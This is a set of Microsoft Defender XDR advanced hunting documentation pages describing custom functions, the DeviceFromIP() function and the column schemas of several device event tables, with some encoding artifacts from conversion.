-| `LastSeenForUser` | `string` | Shows how many days back the attribute was recently in use by the user in days (i.e. ISP, ActionType etc.) |
-| `UncommonForUser` | `string` | Lists the attributes in the event that are uncommon for the user, using this data to help rule out false positives and find out anomalies |
-
-## Apps and services covered
-
-The __CloudAppEvents__ table contains enriched logs from all SaaS applications connected to Microsoft Defender for Cloud Apps, such as:
-- Office 365 and Microsoft Applications, including:
- - Exchange Online
- - SharePoint Online
- - Microsoft Teams
- - Dynamics 365
- - Skype for Business
- - Viva Engage
- - Power Automate
- - Power BI
- - Dropbox
- - Salesforce
- - GitHub
- - Atlassian
-
-Connect supported cloud apps for instant, out-of-the-box protection, deep visibility into the app's user and device activities, and more. For more information, see [Protect connected apps using cloud service provider APIs](/defender-cloud-apps/protect-connected-apps).
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-
security Advanced Hunting Custom Functions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-custom-functions.md
- Title: Custom functions in the advanced hunting schema
-description: Learn about writing your own custom functions for hunting
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 05/16/2023--
-# Use custom functions
---
-**Applies to:**
-- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-## Types of functions
-A function is a type of query in advanced hunting that can be used in other queries as if it's a command. You can create your own custom functions so you can reuse any query logic when you hunt in your environment.
-
-There are three different types of functions in advanced hunting:
-
-![Function types](../../media/advanced-hunting-custom-fxns/function-types.png)
--- **Built-in functions** ΓÇô Prebuilt functions included with Microsoft Defender XDR advanced hunting. These are available in all advanced hunting instances and can't be modified.-- **Shared functions** ΓÇô Custom functions created by users, which are available for all users in a specific tenant and can be modified and controlled by users.-- **My functions** ΓÇô Custom functions created by a user, which can be viewed and modified only by the user who created it.-
-## Write your own custom function
-
-To create a function from the current query in the editor, select **Save** and then **Save as function**.
-
-![Save as function](../../media/advanced-hunting-custom-fxns/save-as-function.png)
-
-Next, provide the following information:
--- **Name** - Name of the function. Can contain only numbers, English letters, and underscores. To avoid accidentally using Kusto keywords, begin or end function names with an underscore or begin with a capital letter.-- **Location** - The folder in which you would like to save the function, either shared or private.-- **Description** - A description that can help other users understand the purpose of the function and how it works.-- **Parameters** - Add a parameter for each variable in the function that requires a value when it's used.
-Add parameters to a function so that you can provide the arguments or values for certain variables when calling the function. This allows the same function to be used in different queries, each allowing for different values for the parameters. Parameters are defined by the following properties:
- - **Type** - Data type for the value
- - **Name** - The name that must be used in the query to replace the parameter value
- - **Default value** - Value to be used for the parameter if a value isn't provided
-
- Parameters are listed in the order they were created, with parameters that have no default value listed above those that have a default value.
-
-![Save as function dialog box](../../media/advanced-hunting-custom-fxns/save-as-function-dialog-box.png)
-
-## Use a custom function
-Use a function in a query by typing its name along with values for any parameter just as you would type in a command. The output of the function can either be returned as results or piped to another command.
-
-Add a function to the current query by double-clicking on its name or selecting the three dots to the right of the function and selecting **Open in query editor**.
-
-If a query requires arguments, provide them using the following syntax: *function_name(parameter 1, parameter 2, ...)*
-
-![Open in query editor](../../media/advanced-hunting-custom-fxns/open-in-query-editor.png)
-
-> [!NOTE]
-> Functions can't be used inside another function.
-
-## Work with function codes
-You can view the code of a function either to gain insight into how it works or to modify its code. Select the three dots to the right of the function and select **Load function code** to open a new tab with the function code.
-
-![Load function code](../../media/advanced-hunting-custom-fxns/load-function-code.png)
-
-## Edit a custom function
-
-Edit the properties of a function by selecting the three dots to the right of the function and selecting **Edit details**. Make any modifications that you want to the properties and parameters of the function then select **Save**.
-
-![Edit function code](../../media/advanced-hunting-custom-fxns/edit-function.png)
-
-If the function code is already loaded to the editor, you can also select **Save** to apply any changes to the code or properties of the function.
-
-> [!NOTE]
-> Once a function is in use in a saved query or a detection rule, you can't edit the function to expand its scope. For example, if you saved a function that queries identity tables, and this function is used in a detection rule, you can't edit the function to include a device table after the fact. To do that, you can save a new function. Product scoping can be narrowed for the same function but not extended.
-
-## Delete a custom function
-
-You can delete functions from **My functions** and functions you created in **Shared functions**. You cannot delete functions that you have not created, unless you have security data manage permissions.
-
-To delete a function, select the three dots to the right of the function and select **Delete**.
-
-![Screenshot that shows how to delete a custom function.](../../media/advanced-hunting-custom-fxns/delete-function.png)
-## See also
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Get more query examples](advanced-hunting-shared-queries.md)
security Advanced Hunting Deviceevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-deviceevents-table.md
- Title: DeviceEvents table in the advanced hunting schema
-description: Learn about antivirus, firewall, and other event types in the miscellaneous device events (DeviceEvents) table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/11/2024--
-# DeviceEvents
--
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-The miscellaneous device events or `DeviceEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about various event types, including events triggered by security controls, such as Microsoft Defender Antivirus and exploit protection. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
--
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |
-| `FileName` | `string` | Name of the file that the recorded action was applied to |
-| `FolderPath` | `string` | Folder containing the file that the recorded action was applied to |
-| `SHA1` | `string` | SHA-1 of the file that the recorded action was applied to |
-| `SHA256` | `string` | SHA-256 of the file that the recorded action was applied to. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `MD5` | `string` | MD5 hash of the file that the recorded action was applied to |
-| `FileSize` | `long` | Size of the file in bytes |
-| `AccountDomain` | `string` | Domain of the account |
-| `AccountName` | `string` | User name of the account; if the device is registered in Microsoft Entra ID, the Entra ID user name of the account might be shown instead |
-| `AccountSid` | `string` | Security Identifier (SID) of the account |
-| `RemoteUrl` | `string` | URL or fully qualified domain name (FQDN) that was being connected to |
-| `RemoteDeviceName` | `string` | Name of the device that performed a remote operation on the affected device. Depending on the event being reported, this name could be a fully-qualified domain name (FQDN), a NetBIOS name, or a host name without domain information. |
-| `ProcessId` | `long` | Process ID (PID) of the newly created process |
-| `ProcessCommandLine` | `string` | Command line used to create the new process |
-| `ProcessCreationTime` | `datetime` | Date and time the process was created |
-| `ProcessTokenElevation` | `string` | Indicates the type of token elevation applied to the newly created process. Possible values: TokenElevationTypeLimited (restricted), TokenElevationTypeDefault (standard), and TokenElevationTypeFull (elevated) |
-| `LogonId` | `long` | Identifier for a logon session. This identifier is unique on the same device only between restarts. |
-| `RegistryKey` | `string` | Registry key that the recorded action was applied to |
-| `RegistryValueName` | `string` | Name of the registry value that the recorded action was applied to |
-| `RegistryValueData` | `string` | Data of the registry value that the recorded action was applied to |
-| `RemoteIP` | `string` | IP address that was being connected to |
-| `RemotePort` | `int` | TCP port on the remote device that was being connected to |
-| `LocalIP` | `string` | IP address assigned to the local device used during communication |
-| `LocalPort` | `int` | TCP port on the local device used during communication |
-| `FileOriginUrl` | `string` | URL where the file was downloaded from |
-| `FileOriginIP` | `string` | IP address where the file was downloaded from |
-| `InitiatingProcessSHA1` | `string` | SHA-1 of the process (image file) that initiated the event |
-| `InitiatingProcessSHA256` | `string` | SHA-256 of the process (image file) that initiated the event. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `InitiatingProcessMD5` | `string` | MD5 hash of the process (image file) that initiated the event |
-| `InitiatingProcessFileName` | `string` | Name of the process that initiated the event |
-| `InitiatingProcessFileSize` | `long` | Size of the file that ran the process responsible for the event |
-| `InitiatingProcessFolderPath` | `string` | Folder containing the process (image file) that initiated the event |
-| `InitiatingProcessId` | `long` | Process ID (PID) of the process that initiated the event |
-| `InitiatingProcessCommandLine` | `string` | Command line used to run the process that initiated the event |
-| `InitiatingProcessCreationTime` | `datetime` | Date and time when the process that initiated the event was started |
-| `InitiatingProcessAccountDomain` | `string` | Domain of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountName` | `string` | User name of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID user name of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountSid` | `string` | Security Identifier (SID) of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountUpn` | `string` | User principal name (UPN) of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID UPN of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountObjectId` | `string` | Microsoft Entra object ID of the user account that ran the process responsible for the event |
-| `InitiatingProcessVersionInfoCompanyName` | `string` | Company name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductName` | `string` | Product name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductVersion` | `string` | Product version from the version information of the process (image file) responsible for the event |
-|` InitiatingProcessVersionInfoInternalFileName` | `string` | Internal file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoOriginalFileName` | `string` | Original file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoFileDescription` | `string` | Description from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessParentId` | `long` | Process ID (PID) of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentFileName` | `string` | Name or full path of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentCreationTime` | `datetime` | Date and time when the parent of the process responsible for the event was started |
-| `InitiatingProcessLogonId` | `long` | Identifier for a logon session of the process that initiated the event. This identifier is unique on the same device only between restarts. |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `AppGuardContainerId` | `string` | Identifier for the virtualized container used by Application Guard to isolate browser activity |
-| `AdditionalFields` | `string` | Additional information about the event in JSON array format |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Devicefilecertificateinfo Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicefilecertificateinfo-table.md
- Title: DeviceFileCertificateInfo table in the advanced hunting schema
-description: Learn about file signing information in the DeviceFileCertificateInfo table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/16/2024--
-# DeviceFileCertificateInfo
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-The `DeviceFileCertificateInfo` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about file signing certificates. This table uses data obtained from certificate verification activities regularly performed on files on endpoints.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the record was generated |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `SHA1` | `string` | SHA-1 of the file that the recorded action was applied to |
-| `IsSigned` | `bool` | Indicates whether the file is signed |
-| `SignatureType` | `string` | Indicates whether signature information was read as embedded content in the file itself or read from an external catalog file |
-| `Signer` | `string` | Information about the signer of the file |
-| `SignerHash` | `string` | Unique hash value identifying the signer |
-| `Issuer` | `string` | Information about the issuing certificate authority (CA) |
-| `IssuerHash` | `string` | Unique hash value identifying issuing certificate authority (CA) |
-| `CertificateSerialNumber` | `string` | Identifier for the certificate that is unique to the issuing certificate authority (CA) |
-| `CrlDistributionPointUrls` | `string` | JSON array listing the URLs of network shares that contain certificates and certificate revocation lists (CRLs) |
-| `CertificateCreationTime` | `datetime` | Date and time the certificate was created |
-| `CertificateExpirationTime` | `datetime` | Date and time the certificate is set to expire |
-| `CertificateCountersignatureTime` | `datetime` | Date and time the certificate was countersigned |
-| `IsTrusted` | `bool` | Indicates whether the file is trusted based on the results of the WinVerifyTrust function, which checks for unknown root certificate information, invalid signatures, revoked certificates, and other questionable attributes |
-| `IsRootSignerMicrosoft` | `boolean` | Indicates whether the signer of the root certificate is Microsoft and if the file is included in Windows operating system |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Devicefileevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicefileevents-table.md
- Title: DeviceFileEvents table in the advanced hunting schema
-description: Learn about file-related events in the DeviceFileEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/11/2024--
-# DeviceFileEvents
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-The `DeviceFileEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about file creation, modification, and other file system events. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |
-| `FileName` | `string`| Name of the file that the recorded action was applied to |
-| `FolderPath` | `string` | Folder containing the file that the recorded action was applied to |
-| `SHA1` | `string` | SHA-1 of the file that the recorded action was applied to |
-| `SHA256` | `string` | SHA-256 of the file that the recorded action was applied to. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `MD5` | `string` | MD5 hash of the file that the recorded action was applied to |
-| `FileOriginUrl` | `string` | URL where the file was downloaded from |
-| `FileOriginReferrerUrl` | `string` | URL of the web page that links to the downloaded file |
-| `FileOriginIP` | `string` | IP address where the file was downloaded from |
-| `PreviousFolderPath` | `string` | Original folder containing the file before the recorded action was applied |
-| `PreviousFileName` | `string` | Original name of the file that was renamed as a result of the action |
-| `FileSize` | `long` | Size of the file in bytes |
-| `InitiatingProcessAccountDomain` | `string` | Domain of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountName` | `string` | User name of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID user name of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountSid` | `string` | Security Identifier (SID) of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountUpn` | `string` | User principal name (UPN) of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID UPN of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountObjectId` | `string` | Microsoft Entra object ID of the user account that ran the process responsible for the event |
-| `InitiatingProcessMD5` | `string` | MD5 hash of the process (image file) that initiated the event |
-| `InitiatingProcessSHA1` | `string` | SHA-1 of the process (image file) that initiated the event |
-| `InitiatingProcessSHA256` | `string` | SHA-256 of the process (image file) that initiated the event. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `InitiatingProcessFolderPath` | `string` | Folder containing the process (image file) that initiated the event |
-| `InitiatingProcessFileName` | `string` | Name of the process that initiated the event |
-| `InitiatingProcessFileSize` | `long` | Size of the process (image file) that initiated the event |
-| `InitiatingProcessVersionInfoCompanyName` | `string` | Company name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductName` | `string` | Product name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductVersion` | `string` | Product version from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoInternalFileName` | `string` | Internal file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoOriginalFileName` | `string` | Original file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoFileDescription` | `string` | Description from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessId` | `long` | Process ID (PID) of the process that initiated the event |
-| `InitiatingProcessCommandLine` | `string` | Command line used to run the process that initiated the event |
-| `InitiatingProcessCreationTime` | `datetime` | Date and time when the process that initiated the event was started |
-| `InitiatingProcessIntegrityLevel` | `string` | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet download. These integrity levels influence permissions to resources. |
-| `InitiatingProcessTokenElevation` | `string` | Token type indicating the presence or absence of User Access Control (UAC) privilege elevation applied to the process that initiated the event |
-| `InitiatingProcessParentId` | `long` | Process ID (PID) of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentFileName` | `string` | Name of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentCreationTime` | `datetime` | Date and time when the parent of the process responsible for the event was started |
-| `RequestProtocol` | `string` | Network protocol, if applicable, used to initiate the activity: Unknown, Local, SMB, or NFS |
-| `RequestSourceIP` | `string` | IPv4 or IPv6 address of the remote device that initiated the activity |
-| `RequestSourcePort` | `int` | Source port on the remote device that initiated the activity |
-| `RequestAccountName` | `string` | User name of account used to remotely initiate the activity |
-| `RequestAccountDomain` | `string` | Domain of the account used to remotely initiate the activity |
-| `RequestAccountSid` | `string` | Security Identifier (SID) of the account used to remotely initiate the activity |
-| `ShareName` | `string` | Name of shared folder containing the file |
-| `SensitivityLabel` | `string` | Label applied to an email, file, or other content to classify it for information protection |
-| `SensitivitySubLabel` | `string` | Sublabel applied to an email, file, or other content to classify it for information protection; sensitivity sublabels are grouped under sensitivity labels but are treated independently |
-| `IsAzureInfoProtectionApplied` | `boolean` | Indicates whether the file is encrypted by Azure Information Protection |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `AppGuardContainerId` | `string` | Identifier for the virtualized container used by Application Guard to isolate browser activity |
-| `AdditionalFields` | `string` | Additional information about the entity or event |
-
-> [!NOTE]
-> File hash information will always be shown when it is available. However, there are several possible reasons why a SHA1, SHA256, or MD5 cannot be calculated. For instance, the file might be located in remote storage, locked by another process, compressed, or marked as virtual. In these scenarios, the file hash information appears empty.
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Devicefromip Function https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-devicefromip-function.md
- Title: DeviceFromIP() function in advanced hunting for Microsoft Defender XDR
-description: Learn how to use the DeviceFromIP() function to get the devices that have been assigned a specific IP address
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 02/16/2024--
-# DeviceFromIP()
---
-**Applies to:**
-- Microsoft Defender XDR----
-Use the `DeviceFromIP()` function in your [advanced hunting](advanced-hunting-overview.md) queries to quickly obtain the list of devices that have been assigned to a certain IP address at a given point in time.
-
-This function returns a table with the following columns:
-
-| Column | Data type | Description |
-||-|-|
-| `IP` | `string` | IP address |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
--
-## Syntax
-
-```kusto
-invoke DeviceFromIP()
-```
-
-## Arguments
-
-This function is invoked as part of a query.
--- **x**ΓÇöThe first parameter is typically already a column in the query. In this case, it's the column named `IP`, the IP address for which you want to see a list of devices that have been assigned to it. It should be a local IP address. External IP addresses aren't supported.-- **y**ΓÇöA second optional parameter is the `Timestamp`, which instructs the function to obtain the most recent assigned devices from a specific time. If not specified, the function returns the latest available records.-
-## Example
--
-### Get the latest devices that have been assigned specific IP addresses
-
-```kusto
-DeviceNetworkEvents
-| limit 100
-| project IP = LocalIP
-| invoke DeviceFromIP()
-```
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Understand the schema](advanced-hunting-schema-tables.md)
security Advanced Hunting Deviceimageloadevents Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-deviceimageloadevents-table.md
- Title: DeviceImageLoadEvents table in the advanced hunting schema
-description: Learn about DLL loading events in the DeviceImageLoadEvents table of the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 04/11/2024--
-# DeviceImageLoadEvents
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-The `DeviceImageLoadEvents` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about DLL loading events. Use this reference to construct queries that return information from this table.
-
-> [!TIP]
-> For detailed information about the events types (`ActionType` values) supported by a table, use the built-in schema reference available in Microsoft Defender XDR.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `ActionType` | `string` | Type of activity that triggered the event. See the [in-portal schema reference](advanced-hunting-schema-tables.md?#get-schema-information-in-the-security-center) for details. |
-| `FileName` | `string` | Name of the file that the recorded action was applied to |
-| `FolderPath` | `string` | Folder containing the file that the recorded action was applied to |
-| `SHA1` | `string` | SHA-1 of the file that the recorded action was applied to |
-| `SHA256` | `string` | SHA-256 of the file that the recorded action was applied to. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `MD5` | `string` | MD5 hash of the file that the recorded action was applied to |
-| `FileSize` | `long` | Size of the file in bytes |
-| `InitiatingProcessAccountDomain` | `string` | Domain of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountName` | `string` | User name of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID user name of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountSid` | `string` | Security Identifier (SID) of the account that ran the process responsible for the event |
-| `InitiatingProcessAccountUpn` | `string` | User principal name (UPN) of the account that ran the process responsible for the event; if the device is registered in Microsoft Entra ID, the Entra ID UPN of the account that ran the process responsible for the event might be shown instead |
-| `InitiatingProcessAccountObjectId` | `string` | Microsoft Entra object ID of the user account that ran the process responsible for the event |
-| `InitiatingProcessIntegrityLevel` | `string` | Integrity level of the process that initiated the event. Windows assigns integrity levels to processes based on certain characteristics, such as if they were launched from an internet download. These integrity levels influence permissions to resources. |
-| `InitiatingProcessTokenElevation` | `string` | Token type indicating the presence or absence of User Access Control (UAC) privilege elevation applied to the process that initiated the event |
-| `InitiatingProcessSHA1` | `string` | SHA-1 of the process (image file) that initiated the event |
-| `InitiatingProcessSHA256` | `string` | SHA-256 of the process (image file) that initiated the event. This field is usually not populated ΓÇö use the SHA1 column when available. |
-| `InitiatingProcessMD5` | `string` | MD5 hash of the process (image file) that initiated the event |
-| `InitiatingProcessFileName` | `string` | Name of the process that initiated the event |
-| `InitiatingProcessFileSize` | `long` | Size of the file that ran the process responsible for the event |
-| `InitiatingProcessVersionInfoCompanyName` | `string` | Company name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductName` | `string` | Product name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoProductVersion`| `string` | Product version from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoInternalFileName` | `string` | Internal file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoOriginalFileName` | `string` | Original file name from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessVersionInfoFileDescription` | `string` | Description from the version information of the process (image file) responsible for the event |
-| `InitiatingProcessId` | `long` | Process ID (PID) of the process that initiated the event |
-| `InitiatingProcessCommandLine` | `string` | Command line used to run the process that initiated the event |
-| `InitiatingProcessCreationTime` | `datetime` | Date and time when the process that initiated the event was started |
-| `InitiatingProcessFolderPath` | `string` | Folder containing the process (image file) that initiated the event |
-| `InitiatingProcessParentId` | `long` | Process ID (PID) of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentFileName` | `string` | Name of the parent process that spawned the process responsible for the event |
-| `InitiatingProcessParentCreationTime` | `datetime` | Date and time when the parent of the process responsible for the event was started |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `AppGuardContainerId` | `string` | Identifier for the virtualized container used by Application Guard to isolate browser activity |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Deviceinfo Table https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-deviceinfo-table.md
- Title: DeviceInfo table in the advanced hunting schema
-description: Learn about OS, computer name, and other machine information in the DeviceInfo table of the advanced hunting schema
--
- - NOCSH
------ tier3-- m365-security- Previously updated : 01/16/2024--
-# DeviceInfo
---
-**Applies to:**
-- Microsoft Defender XDR-- Microsoft Defender for Endpoint-
-The `DeviceInfo` table in the [advanced hunting](advanced-hunting-overview.md) schema contains information about devices in the organization, including OS version, active users, and computer name. Use this reference to construct queries that return information from this table.
-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-For information on other tables in the advanced hunting schema, [see the advanced hunting reference](advanced-hunting-schema-tables.md).
-
-| Column name | Data type | Description |
-|-|--|-|
-| `Timestamp` | `datetime` | Date and time when the event was recorded |
-| `DeviceId` | `string` | Unique identifier for the device in the service |
-| `DeviceName` | `string` | Fully qualified domain name (FQDN) of the device |
-| `ClientVersion` | `string` | Version of the endpoint agent or sensor running on the device |
-| `PublicIP` | `string` | Public IP address used by the onboarded device to connect to the Microsoft Defender for Endpoint service. This could be the IP address of the device itself, a NAT device, or a proxy. |
-| `OSArchitecture` | `string` | Architecture of the operating system running on the device |
-| `OSPlatform` | `string` | Platform of the operating system running on the device. This indicates specific operating systems, including variations within the same family, such as Windows 11, Windows 10 and Windows 7. |
-| `OSBuild` | `long` | Build version of the operating system running on the device |
-| `IsAzureADJoined` | `boolean` | Boolean indicator of whether device is joined to the Microsoft Entra ID |
-| `JoinType` | `string` | The device's Microsoft Entra ID join type |
-| `AadDeviceId` | `string` | Unique identifier for the device in Microsoft Entra ID |
-| `LoggedOnUsers` | `string` | List of all users that are logged on the device at the time of the event in JSON array format |
-| `RegistryDeviceTag` | `string` | Device tag added through the registry |
-| `OSVersion` | `string` | Version of the operating system running on the device |
-| `MachineGroup` | `string` | Machine group of the device. This group is used by role-based access control to determine access to the device. |
-| `ReportId` | `long` | Event identifier based on a repeating counter. To identify unique events, this column must be used in conjunction with the DeviceName and Timestamp columns. |
-| `OnboardingStatus` | `string` | Indicates whether the device is currently onboarded or not to Microsoft Defender For Endpoint or if the device is not supported |
-| `AdditionalFields` | `string` | Additional information about the event in JSON array format |
-| `DeviceCategory` | `string` | Broader classification that groups certain device types under the following categories: Endpoint, Network device, IoT, Unknown |
-| `DeviceType` | `string` | Type of device based on purpose and functionality, such as network device, workstation, server, mobile, gaming console, or printer |
-| `DeviceSubtype` | `string` | Additional modifier for certain types of devices, for example, a mobile device can be a tablet or a smartphone; only available if device discovery finds enough information about this attribute |
-| `Model` | `string` | Model name or number of the product from the vendor or manufacturer, only available if device discovery finds enough information about this attribute |
-| `Vendor` | `string` | Name of the product vendor or manufacturer, only available if device discovery finds enough information about this attribute |
-| `OSDistribution` | `string` | Distribution of the OS platform, such as Ubuntu or RedHat for Linux platforms |
-| `OSVersionInfo` | `string` | Additional information about the OS version, such as the popular name, code name, or version number |
-| `MergedDeviceIds` | `string` | Previous device IDs that have been assigned to the same device |
-| `MergedToDeviceId` | `string` | The most recent device ID assigned to a device |
-| `IsInternetFacing` | `boolean` | Indicates whether the device is internet-facing |
-| `SensorHealthState` | `string` | Indicates health of the device's EDR sensor, if onboarded to Microsoft Defender For Endpoint |
-| `IsExcluded`| `bool` | Determines if the device is currently excluded from Microsoft Defender for Vulnerability Management experiences |
